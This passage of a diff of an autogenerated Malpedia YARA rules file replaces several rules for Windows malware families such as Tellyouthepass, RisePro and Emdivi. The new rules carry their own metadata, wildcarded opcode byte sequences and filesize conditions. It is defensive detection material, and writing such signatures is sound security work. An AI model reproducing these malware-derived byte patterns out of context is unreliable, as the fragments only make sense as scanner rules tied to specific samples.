-		$sequence_5 = { 68000000c0 ff750c e8???????? a3???????? 833d????????ff 0f84b2000000 e8???????? }
-		$sequence_6 = { 6824000000 e8???????? 83c404 a3???????? 8bd8 8bf8 }
-		$sequence_7 = { 8b5d08 8b1b 83c304 895dfc 8965f8 6805000000 8b5dfc }
-		$sequence_8 = { 53 8903 8bd8 c70300000000 c7430400000000 5b 8b5d08 }
-		$sequence_9 = { 51 8d542478 8944247c 6a00 52 40 6a00 }
+		$sequence_0 = { e8???????? 837c242400 8bf8 740c ff742428 e8???????? 83c404 }
+		$sequence_1 = { 03d8 eb49 b8d34d6210 f7e3 8bca 8b5514 c1e906 }
+		$sequence_2 = { 50 8d4110 50 8d4129 50 }
+		$sequence_3 = { 8b048528cf0210 0fb6440828 83e040 5d c3 e8???????? c70009000000 }
+		$sequence_4 = { 84c0 0f8429010000 8b4c2408 83c620 8b01 c1e005 }
+		$sequence_5 = { b81f85eb51 f7eb 5f c1fa05 8bca c1e91f 03ca }
+		$sequence_6 = { 6a01 53 ff15???????? ebe0 b80d000780 5f 5e }
+		$sequence_7 = { 68000000c0 57 ff15???????? 8bf8 83ffff 74c5 8b4dec }
+		$sequence_8 = { 3245f0 32ec 3245e4 3245e0 3245e8 3245d0 3245ff }
+		$sequence_9 = { 50 e8???????? 83a628cf021000 59 83c604 81fe00020000 72dd }
 
 	condition:
-		7 of them and filesize < 1417216
+		7 of them and filesize < 397312
 }
-rule MALPEDIA_Win_Playwork_Auto : FILE
+rule MALPEDIA_Win_Tellyouthepass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "253bcdde-b9c7-5158-90ca-b4dcc36f9889"
+		id = "354e0e6c-ccce-5215-81be-86e86c2d035f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.playwork_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tellyouthepass_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "93e0526e64b6e0ff6fb1dc40df8f238384033948c1e004d69238a8eee94e726f"
+		logic_hash = "dc25f522d82a6df0aaae3de9d80ac3b6a17f46baeb51d065b8c3d1eda2c481dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131197,32 +131044,32 @@ rule MALPEDIA_Win_Playwork_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 59 8945f0 0f84d4010000 8d4df4 }
-		$sequence_1 = { eb02 32db 8ac3 8acb c0e807 d0e1 }
-		$sequence_2 = { 57 8d857ce9ffff 56 50 6800004004 8d4de0 ff7510 }
-		$sequence_3 = { 8bd0 8d85e8afffff 50 8955ec ffd3 8b4dec }
-		$sequence_4 = { 53 50 8d4510 6a08 50 57 ffd6 }
-		$sequence_5 = { c1eb18 330c95344b3f00 8b55e0 8b349d34573f00 c1ea10 }
-		$sequence_6 = { 50 8d85b8ebffff 68???????? 50 e8???????? 83c444 8d85b8ebffff }
-		$sequence_7 = { e8???????? 8b45fc 83c40c 668b4008 50 ff15???????? 0fb7c0 }
-		$sequence_8 = { a4 284405c8 40 83f822 7cf6 }
-		$sequence_9 = { 8bce 8975e8 c1e918 8b3c8d34573f00 8b4de0 333c9534533f00 }
+		$sequence_0 = { 488b0d???????? eb0a 488b4c2448 488b5c2420 48894c2440 48895c2428 488d050b4e1000 }
+		$sequence_1 = { 4d85c0 7f1d 488b8c24f0000000 488b9424f8000000 488b9c24a8010000 e9???????? 4889bc2418010000 }
+		$sequence_2 = { f20f10442440 e8???????? 488d051a1f1a00 bb0c000000 6690 e8???????? e8???????? }
+		$sequence_3 = { 80f902 7345 884c2417 0fb6d1 4889542420 48c1e206 488d35728f3000 }
+		$sequence_4 = { 48c740102c000000 833d????????00 750d 488d0d57b70600 48894808 eb10 488d7808 }
+		$sequence_5 = { 4c8b4028 4c8b4830 4c8b5020 488dbc2490010000 488d3585530b00 48896c24f0 488d6c24f0 }
+		$sequence_6 = { 6690 eb10 488d7a70 488d155b4b0d00 e8???????? 90 488b15???????? }
+		$sequence_7 = { bb06000000 90 e8???????? 488b442410 e8???????? 488d0525631700 bb0b000000 }
+		$sequence_8 = { eb09 4889c7 90 e8???????? 488d0514690e00 488b5c2438 488d0d73e11000 }
+		$sequence_9 = { eb14 488d7818 488b8c24c0020000 0f1f00 e8???????? 48c740100b000000 488d0d9ed01300 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 7152640
 }
-rule MALPEDIA_Win_Unidentified_006_Auto : FILE
+rule MALPEDIA_Win_Tigerlite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "97d4c257-a67c-55d3-ab2d-8345f8133abc"
+		id = "119827aa-8530-5cae-8d65-e56592a0b2d2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_006_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tigerlite_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "e5d463a76ca11d9b4f7e0289dbf185a64b45114b95835b2526afa161b71d15ae"
+		logic_hash = "b688ea808508193aa1c7d4aa7527d4ad25741bc4cd2a88205c0fc518db087920"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131236,32 +131083,38 @@ rule MALPEDIA_Win_Unidentified_006_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 817c0afc54494b46 750c 83c2fc e8???????? }
-		$sequence_1 = { 83c603 25ff000000 30041a 42 3bd1 72df }
-		$sequence_2 = { 7410 8b55f4 85d2 7409 e8???????? }
-		$sequence_3 = { 59 84db 750d 85f6 7416 56 e8???????? }
-		$sequence_4 = { 85db 0f840a010000 56 ff75ec }
-		$sequence_5 = { 1bc0 23f8 0fb6875c204000 47 03c6 83c603 }
-		$sequence_6 = { 56 e8???????? 59 eb0d 8b45e8 8b4d08 }
-		$sequence_7 = { 85c0 7529 8b4dfc 85c9 }
-		$sequence_8 = { 832600 832700 6a06 ebba }
-		$sequence_9 = { 50 ff75ec 8bfb ff15???????? 85c0 }
+		$sequence_0 = { 488bf8 4883f8ff 7520 488d15e1c50100 488bce e8???????? }
+		$sequence_1 = { 4885c0 0f84a9010000 488bc8 ff15???????? 488d1520ad0000 }
+		$sequence_2 = { 803c0700 75f7 488d4f01 4d8bce }
+		$sequence_3 = { 2bca 8d95e0f9ffff 8d7201 8a02 42 }
+		$sequence_4 = { 50 e8???????? 83c40c c645f400 833d????????00 c745f500000000 }
+		$sequence_5 = { e8???????? 4c8d4530 8d5614 488d0defa70100 897530 e8???????? 8b5530 }
+		$sequence_6 = { ff15???????? 8bf8 e9???????? 8b8528e5ffff 8b0c85489d4100 8b8524e5ffff }
+		$sequence_7 = { 0fbec2 0fbe80d8214100 83e00f eb02 33c0 }
+		$sequence_8 = { 8d859cf2ffff 03c1 8b8d24e5ffff 50 8b8528e5ffff 8b0485489d4100 ff3401 }
+		$sequence_9 = { 50 8b0495489d4100 ff3418 ff15???????? 85c0 750a }
+		$sequence_10 = { 488bfa 488bd9 488d0549e90000 488981a0000000 83611000 }
+		$sequence_11 = { 8a06 46 88441905 8b45f4 83fa02 7c11 8b0c85489d4100 }
+		$sequence_12 = { ff742414 8b442420 03c6 57 }
+		$sequence_13 = { 785b 8bc3 2503000080 7d07 }
+		$sequence_14 = { 0fb605???????? 488bf9 88442428 e8???????? 4885c0 0f8422010000 }
+		$sequence_15 = { c3 33d2 41b800040000 488bc8 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 349184
 }
-rule MALPEDIA_Win_Bka_Trojaner_Auto : FILE
+rule MALPEDIA_Win_Fancyfilter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef77dd44-0b56-55a7-bd80-bb8aedf02909"
+		id = "975f685e-f179-537e-9fa3-85eadc815e28"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bka_trojaner_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fancyfilter_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "f15473c37bfc124735dc99ab7490e1138bd0e34fbe32e10f0ddc7571161a090f"
+		logic_hash = "d344d0526413aed72b15674c72f5f795f13d63b4791189f46999d274791cb577"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131275,32 +131128,32 @@ rule MALPEDIA_Win_Bka_Trojaner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8365d800 c745dce7384000 a1???????? 8945e0 }
-		$sequence_1 = { 50 56 e8???????? 83c408 8b54241c 55 }
-		$sequence_2 = { 83ec4c 56 8b742454 6808020000 68???????? }
-		$sequence_3 = { ff15???????? 8b542414 56 52 ff15???????? 8b4570 }
-		$sequence_4 = { 0fb6442404 8a4c240c 8488e1eb4000 751e 837c240800 7410 }
-		$sequence_5 = { 5e c3 56 8b742408 8b06 813863736de0 751c }
-		$sequence_6 = { ff7508 83c008 e8???????? 3b4514 59 752d 837df800 }
-		$sequence_7 = { 50 8db6b4e14000 ff36 e8???????? }
-		$sequence_8 = { 83ff01 751a 8b442414 8b08 8b542408 51 }
-		$sequence_9 = { 7508 8b4508 a3???????? 5b 33c0 5f }
+		$sequence_0 = { 891d???????? 891d???????? b001 5b }
+		$sequence_1 = { ff15???????? 83c420 83f803 7409 }
+		$sequence_2 = { 66833800 7404 b001 eb02 }
+		$sequence_3 = { 740f 8d4f20 51 50 ff15???????? }
+		$sequence_4 = { 83f80a 7305 83c030 eb03 83c057 8801 }
+		$sequence_5 = { 51 50 ff15???????? 8b36 }
+		$sequence_6 = { a1???????? 83c012 50 ff15???????? }
+		$sequence_7 = { 8d4f20 51 50 ff15???????? 8b36 }
+		$sequence_8 = { b805400080 c20400 56 8b742408 8b4618 85c0 }
+		$sequence_9 = { 83c030 eb03 83c057 8801 49 }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 169984
 }
-rule MALPEDIA_Win_Ati_Agent_Auto : FILE
+rule MALPEDIA_Win_Spectre_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7923380a-3a79-5e9d-9e37-869ed5e218b2"
+		id = "ab060ee1-08ad-588e-8d49-1ae94553e1b3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ati_agent_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spectre"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spectre_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "6ad1a7df4d93d69034a0d3b89b3f7bb98b02a7b32cfc4a510150a1520d075ff9"
+		logic_hash = "84c50bd871d13f0a4f1a8853e9cdfc23094379080d0055ac204b2f23d3a74297"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131314,32 +131167,32 @@ rule MALPEDIA_Win_Ati_Agent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4885c0 7404 f0440108 488d4158 41b806000000 488d1532cf0000 }
-		$sequence_1 = { c3 48895c2408 4889742410 57 4883ec70 8bf2 }
-		$sequence_2 = { 48895c2408 57 4883ec20 488d1d67870000 }
-		$sequence_3 = { 488d4158 41b806000000 488d1594c50000 483950f0 740b }
-		$sequence_4 = { 4883ec40 488b05???????? 4833c4 4889442438 498bf0 488bfa }
-		$sequence_5 = { 7d16 4863cf 8a84191d010000 42888401e0e80000 ffc7 ebde }
-		$sequence_6 = { 4c8bef 49c1fd05 4c8d3528e20000 83e31f 486bdb58 }
-		$sequence_7 = { e8???????? 4883c448 c3 4053 4883ec40 8bd9 }
-		$sequence_8 = { 48890d???????? c3 4883ec28 4c8bc1 }
-		$sequence_9 = { e8???????? b9ff000000 e8???????? 488bfb 4803ff 4c8d2df1790000 49837cfd0000 }
+		$sequence_0 = { 8bce 50 ff750c ff7508 e8???????? 8d4de4 e8???????? }
+		$sequence_1 = { 6bc938 53 56 8b048538324700 8b7508 57 8bfe }
+		$sequence_2 = { 8d4d20 e8???????? 8b4dfc 33cd 5e e8???????? c9 }
+		$sequence_3 = { 50 e8???????? 8b8424b4000000 83c434 8b4c247c 2bc1 83e830 }
+		$sequence_4 = { c605????????01 e8???????? eb0c 881d???????? 881d???????? 8b442448 bb00100000 }
+		$sequence_5 = { 8bcf 89442420 e8???????? 89442410 8bc3 2b442414 6a18 }
+		$sequence_6 = { 6a01 be???????? 8d8de4feffff 56 e8???????? 8d454c 50 }
+		$sequence_7 = { 8b4e0c b8ffffff7f 2bc1 3bc3 7279 83651000 8d4510 }
+		$sequence_8 = { 8d8c24fc010000 e8???????? 8d8424f8010000 50 8d842454010000 68???????? 50 }
+		$sequence_9 = { e8???????? 8b44242c 83c40c 0430 89442420 8b44245c 8b542420 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 990208
 }
-rule MALPEDIA_Win_Burnbook_Auto : FILE
+rule MALPEDIA_Win_Cmstar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8a1b3af-c791-5a49-95d1-39ec74922c1f"
+		id = "a9e2a661-537d-568b-85df-f27a686a58fb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.burnbook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.burnbook_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cmstar_auto.yar#L1-L177"
 		license_url = "N/A"
-		logic_hash = "6939db5a1f9211e1e7ddaeea7285f0f9407b5dc4feaa3227884659565987f25b"
+		logic_hash = "cb1d0cd52e24cba8a51ced68bf521fb28bf6b675c076737849c87cad9d60f02d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131353,32 +131206,38 @@ rule MALPEDIA_Win_Burnbook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7d8 418906 418bc3 83ffff 7d02 f7d8 410fafd9 }
-		$sequence_1 = { e8???????? 8945ef 41b881010000 488bd7 488bcb e8???????? 4885c0 }
-		$sequence_2 = { f30f2cc0 8801 48ffc1 4883ea01 75c9 488b459f 4c2b5028 }
-		$sequence_3 = { ffc1 448bd1 f7d9 8d344e 0f1f00 0fb60a 0faf08 }
-		$sequence_4 = { f20f1003 f20f59c6 f20f58c7 e8???????? f20f2cc0 89862c0c0000 f20f104308 }
-		$sequence_5 = { e8???????? 85c0 7419 488b5308 8b0c3a 85c9 7407 }
-		$sequence_6 = { f30f2c442440 4883c304 488d7f04 8947fc 4883ee01 75dc 488b742430 }
-		$sequence_7 = { f30f7f840cf0030000 f30f5bc2 f30f7f440cf0 81fa00010000 0f8c5cffffff 0f28bc24100c0000 0f28b424200c0000 }
-		$sequence_8 = { f30f114014 488bc3 4881c448010000 415f 415e 5f 5e }
-		$sequence_9 = { e8???????? 85c0 7814 0fb6c0 488bd6 488bcd 0bf8 }
+		$sequence_0 = { 53 56 bb04010000 57 53 }
+		$sequence_1 = { 8b45e8 ff75e0 ff30 e8???????? 8b4df8 }
+		$sequence_2 = { 8b4dec c1e802 6a04 52 8d0481 50 e8???????? }
+		$sequence_3 = { ff15???????? 8bc6 e9???????? 6a10 }
+		$sequence_4 = { ff15???????? 6a04 e8???????? be00040000 }
+		$sequence_5 = { 8b45d8 836dfc10 ff75fc 8945e0 8b45dc 83c310 8945e4 }
+		$sequence_6 = { ff15???????? 6a03 58 5f 5e 5b c9 }
+		$sequence_7 = { 85c0 7504 6a03 eb0d 803b4d }
+		$sequence_8 = { 888204420010 83c9ff 33c0 42 f2ae f7d1 49 }
+		$sequence_9 = { 8bf0 85f6 74b2 817c240cc8000000 741c a1???????? 33f6 }
+		$sequence_10 = { 81ec08060000 53 55 56 57 33db b9ff000000 }
+		$sequence_11 = { a1???????? 8b10 52 53 }
+		$sequence_12 = { 49 8d7c2418 8bc1 83c9ff 89442410 }
+		$sequence_13 = { a1???????? 85c0 7505 a1???????? 6a00 6a00 6a03 }
+		$sequence_14 = { be01000000 8b4c2420 51 ff15???????? 3beb 7409 55 }
+		$sequence_15 = { 64890d00000000 81c4c0120000 c3 8b8c24d0120000 33db 3bcb 741c }
 
 	condition:
-		7 of them and filesize < 22976512
+		7 of them and filesize < 4268032
 }
-rule MALPEDIA_Win_Tinytyphon_Auto : FILE
+rule MALPEDIA_Win_Risepro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ab55cd29-217a-5df2-bee5-a74f289c1c92"
+		id = "a15990c8-9753-5e87-a4b5-d8648a3a2e45"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinytyphon_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.risepro_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "68d6c1790e6e0cef7204bca3122eca023e6ea67ccbabc152f7ca7bf6dee039f5"
+		logic_hash = "27ab7b74bb4368f92b33ca48075a5bb9daa807fbe12d867a6bb9fe94c38b462c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131392,32 +131251,32 @@ rule MALPEDIA_Win_Tinytyphon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ff15???????? 8d55ec 52 ff15???????? 8d45ec }
-		$sequence_1 = { 7412 68???????? 8d85e8feffff 50 ff15???????? 8d8dccfdffff 51 }
-		$sequence_2 = { 0bc2 8b4df4 0fb6512b c1e218 0bc2 8b4d08 }
-		$sequence_3 = { 8b55c8 0355c0 8b45d4 0345c0 8a08 880a }
-		$sequence_4 = { 8b550c 8b4208 50 68???????? 8b4d08 51 ff15???????? }
-		$sequence_5 = { 83bd54ffffff00 7517 8b9558ffffff 52 ff15???????? b801000000 e9???????? }
-		$sequence_6 = { c1e918 8b550c 884a53 8b450c }
-		$sequence_7 = { 85c0 744b 8b5508 0fb602 }
-		$sequence_8 = { 8945f0 837df000 0f8485000000 8b4df0 0fbe5108 83fa02 7410 }
-		$sequence_9 = { 8945f8 8b4ddc f7d1 0b4df8 334de4 8b5508 038a94000000 }
+		$sequence_0 = { eb04 32c0 eb02 b001 8be5 5d }
+		$sequence_1 = { e8???????? 50 8d4de4 e8???????? ebdc 8d4de4 }
+		$sequence_2 = { 8b5508 8d0c4a 8d5514 e8???????? }
+		$sequence_3 = { 8995f0feffff b808000000 6bc800 8b95ccfeffff 8b840a8c000000 }
+		$sequence_4 = { 8b4de8 0fb79180000000 52 8b4508 50 8b4de8 e8???????? }
+		$sequence_5 = { c745fc00000000 c745d888bd4100 8b4de8 51 8b55d8 52 8d4def }
+		$sequence_6 = { 8b55c8 8955b0 8d45d8 50 }
+		$sequence_7 = { 8bc8 e8???????? 8945f8 e8???????? 8945f4 }
+		$sequence_8 = { 64a300000000 894dc4 8b4dc4 83c11c e8???????? }
+		$sequence_9 = { 2b45f0 3b45f4 7305 e8???????? 8a45fe }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 280576
 }
-rule MALPEDIA_Win_Minibike_Auto : FILE
+rule MALPEDIA_Win_Vyveva_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b4e41190-0fa0-5a7c-a07b-bb3addd5d6da"
+		id = "c28bdd95-7642-5880-a40e-4b358402045a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibike"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minibike_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vyveva_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "d63c47c9b294af645af17048597f95704ec7db4dff6a776da81f783cf994a29a"
+		logic_hash = "96e07d213688d1c1087554cfee92b5503a65dfc0259352cd96965149acc4d781"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131431,32 +131290,32 @@ rule MALPEDIA_Win_Minibike_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 0f434520 6800008004 6a00 6a00 6a00 51 }
-		$sequence_1 = { 2bc2 3bc8 0f8758010000 8d040a 8bce 3bc6 0f43c8 }
-		$sequence_2 = { 75bd 8b5508 8b451c 83f810 7227 8d4801 8bc2 }
-		$sequence_3 = { 8975b4 a801 742b e8???????? 6a00 c7461000000000 8bce }
-		$sequence_4 = { 8985b4fdffff 51 0f57c0 c785ecfdffff00000000 8d8588fdffff 660fd685e4fdffff 0f2805???????? }
-		$sequence_5 = { 2bc6 8bbda4feffff c1f802 898decfcffff 8985f8fcffff 85c0 7441 }
-		$sequence_6 = { 8b85c8fdffff 33c9 8bb5c4fdffff 2bc6 8bbdd0fdffff c1f802 898df4fcffff }
-		$sequence_7 = { c7431000000000 c7431407000000 85c0 7568 50 68???????? 8bcb }
-		$sequence_8 = { eb06 8b95acfcffff 83fa08 7235 8b8d98fcffff 8d145502000000 8bc1 }
-		$sequence_9 = { 83f81f 0f87e5020000 51 56 e8???????? 83c408 c745b800000000 }
+		$sequence_0 = { 7404 ff7604 59 3b7108 7506 50 8f4108 }
+		$sequence_1 = { 8b442428 3b4c2438 740c 3b4c2438 7406 33c9 034c2438 }
+		$sequence_2 = { 83ec04 33ed 8d6c2c74 83ed74 c74424fcffffffff 83ec04 68???????? }
+		$sequence_3 = { e8???????? 8b4c242c 8b442428 8d54243c 894c2440 6a08 52 }
+		$sequence_4 = { 037e3c 8d4c0f38 83e938 50 5f 51 52 }
+		$sequence_5 = { 51 5d 59 55 59 6a01 }
+		$sequence_6 = { 8b8c2434020000 8d54240c 894c240c 6a04 52 56 59 }
+		$sequence_7 = { 8365f000 8365f400 8365f800 8365fc00 c745f0900c0110 }
+		$sequence_8 = { 33c0 0306 395814 0f854b010000 8b4c2410 55 8f4614 }
+		$sequence_9 = { 741c 56 8b742414 ff36 59 41 51 }
 
 	condition:
-		7 of them and filesize < 574464
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Mindware_Auto : FILE
+rule MALPEDIA_Win_Tonerjam_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "23a8487f-e2c7-545b-81cb-6372e4caaae2"
+		id = "f786075c-cfe5-5b49-a6e1-4889818e7624"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mindware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mindware_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonerjam"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tonerjam_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "c1e547ffdf51514bc4e27c57582e862eb5175ec80e05ba2145cb8dfa6653e95b"
+		logic_hash = "d8a6c742127525a08706ace06fd5028ecb9ea4f1402f1305542963485e91aa8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131470,32 +131329,32 @@ rule MALPEDIA_Win_Mindware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? e8???????? 83c40c 8b4dfc 8b7dfc 83c72c }
-		$sequence_1 = { 50 8b4d08 8b5108 8b4508 8b12 8b4808 }
-		$sequence_2 = { c7855cecfffff8d44300 c78560ecffff00d54300 c78564ecffff0cd54300 c78568ecffff18d54300 c7856cecffff24d54300 c78570ecffff2cd54300 c78574ecffff34d54300 }
-		$sequence_3 = { c1e810 83e03f c1e918 83e13f 8b0c8d603a4400 330c8520394400 8bc2 }
-		$sequence_4 = { 33148dc0bc4400 8bcb c1e918 33148dc0c44400 8b4df0 }
-		$sequence_5 = { e8???????? 8b4dfc 51 e8???????? 8b55fc c7423000000000 8b45fc }
-		$sequence_6 = { c78540f1ffffbce04300 c78544f1ffffc4e04300 c78548f1ffffcce04300 c7854cf1ffffd4e04300 c78550f1ffffe0e04300 c78554f1ffffece04300 c78558f1fffff4e04300 }
-		$sequence_7 = { 83e03f 330c8520384400 330c95e03c4400 8bd3 33f1 c1ca04 33576c }
-		$sequence_8 = { 8b4dfc 8b7dfc 83c72c 32c0 8b4928 }
-		$sequence_9 = { 0fb689f0d84400 c1e108 33d1 8b4df0 c1e908 0fb6c9 c1e208 }
+		$sequence_0 = { 488d4c2458 448d4218 ff15???????? 488d442458 c744247068000000 4889442448 }
+		$sequence_1 = { 41b804010000 ff15???????? 33d2 488d8d50010000 41b804010000 }
+		$sequence_2 = { 4883ec28 e8???????? 488bc8 488d15314e0100 4883c428 e9???????? 48895c2418 }
+		$sequence_3 = { 488d4508 458bce 4533c0 4889442420 488d1515c10100 48c7c102000080 ff15???????? }
+		$sequence_4 = { ff15???????? 85c0 757c 48c7c0ffffffff }
+		$sequence_5 = { 4903c0 660f1f840000000000 8030e5 488d4001 }
+		$sequence_6 = { 33d2 e8???????? 4885db 7414 488d0536d70100 483bd8 }
+		$sequence_7 = { 33c9 ff15???????? cc b801000000 488b8c2430010000 4833cc e8???????? }
+		$sequence_8 = { c3 397c2440 488b5c2448 400f95c7 8bc7 }
+		$sequence_9 = { 488d0dbac10100 e8???????? 48c7c3ffffffff 488d8d70020000 488bc3 0f1f4000 48ffc0 }
 
 	condition:
-		7 of them and filesize < 661504
+		7 of them and filesize < 315392
 }
-rule MALPEDIA_Win_Bookcodesrat_Auto : FILE
+rule MALPEDIA_Win_Emdivi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f4de16d7-c6b7-5d95-8f65-784498dd67cf"
+		id = "ef5b2254-03f0-58f4-b962-bbb2c39fe141"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bookcodesrat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.emdivi_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "86df5d17676a07501443cee06a4988ba13f3d4cc771e2022b238854a7e0b8406"
+		logic_hash = "a232eb74848fdd496e4591cb6ccd862ae9760c83f1359caadd1d0bedc4ecfd7c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131509,32 +131368,32 @@ rule MALPEDIA_Win_Bookcodesrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c785f8010000097c504a 66c785fc0100004c4a c685fe0100006a 8845c8 488945c9 8945d1 668945d5 }
-		$sequence_1 = { 33d2 41b848090000 897c2444 897c2440 e8???????? 41ff942490000000 488d4c2444 }
